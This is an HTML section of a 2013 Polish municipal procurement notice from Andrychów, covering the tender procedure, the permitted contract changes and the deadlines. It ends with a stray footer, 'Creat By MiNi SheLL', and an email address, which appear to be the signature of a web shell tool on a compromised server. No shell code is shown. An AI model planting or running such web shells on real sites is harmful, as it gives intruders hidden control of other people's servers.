<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>a) zmiana terminu wykonania przedmiotu umowy w przypadku:
-   zmiany przepisów prawnych istotnych dla realizacji przedmiotu umowy,
- wystąpienia niesprzyjających warunków atmosferycznych lub przyczyn technologicznych powodujących konieczność całkowitego przerwania prac, co zostanie potwierdzone przez Zamawiającego; termin realizacji zadania zostanie przedłużony o taką ilość dni kalendarzowych, na jaką roboty zostały przerwane,
- wystąpienia zamówień dodatkowych niezbędnych do prawidłowego wykonania zamówienia podstawowego, których wykonanie stało się konieczne na skutek sytuacji niemożliwej wcześniej do przewidzenia i które mają wpływ na termin realizacji zamówienia,
- niemożności rozpoczęcia realizacji umowy lub zaistnienia przerw w jej wykonaniu z przyczyn leżących po stronie Zamawiającego; wówczas termin wykonania robót ulega przesunięciu o okres wynikający z przerw lub opóźnienia rozpoczęcia robót,
- działań osób trzecich uniemożliwiających wykonanie robót, które to działania nie są konsekwencją winy którejkolwiek ze stron umowy,
- zmiany  w   treści    umowy   o  dofinansowanie  projektu  zawartej  przez   Zamawiającego z podmiotem współfinansującym,                                                                                       - zmiany  wytycznych  podmiotu   współfinansującego  dotyczących   realizacji   przedmiotu umowy.
b) zmiana wynagrodzenia brutto za przedmiot umowy w przypadku zmiany obowiązującej stawki podatku VAT;
c) zmiana zakresu rzeczowego przedmiotu zamówienia w przypadku celowości  wprowadzenia rozwiązań zamiennych do dokumentacji projektowej lub sposobu wykonania robót pod warunkiem, że zmiany te będą korzystne dla Zamawiającego;
d) zmiana osób upoważnionych do dokonywania czynności lub zmiana danych teleadresowych określonych w umowie</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.andrychow.eu<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miejski w Andrychowie, Rynek 15, 34-120 Andrychów, Wydział Inwestycji i Drogownictwa, pok. 119, w godzinach pracy Urzędu Miejskiego lub za zaliczeniem pocztowym.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 11.04.2013 godzina 09:00, miejsce: Urząd Miejski w Andrychowie, Rynek 15, 34-120 Andrychów, w sekretariacie Burmistrza / II piętro /.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> nie dotyczy.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com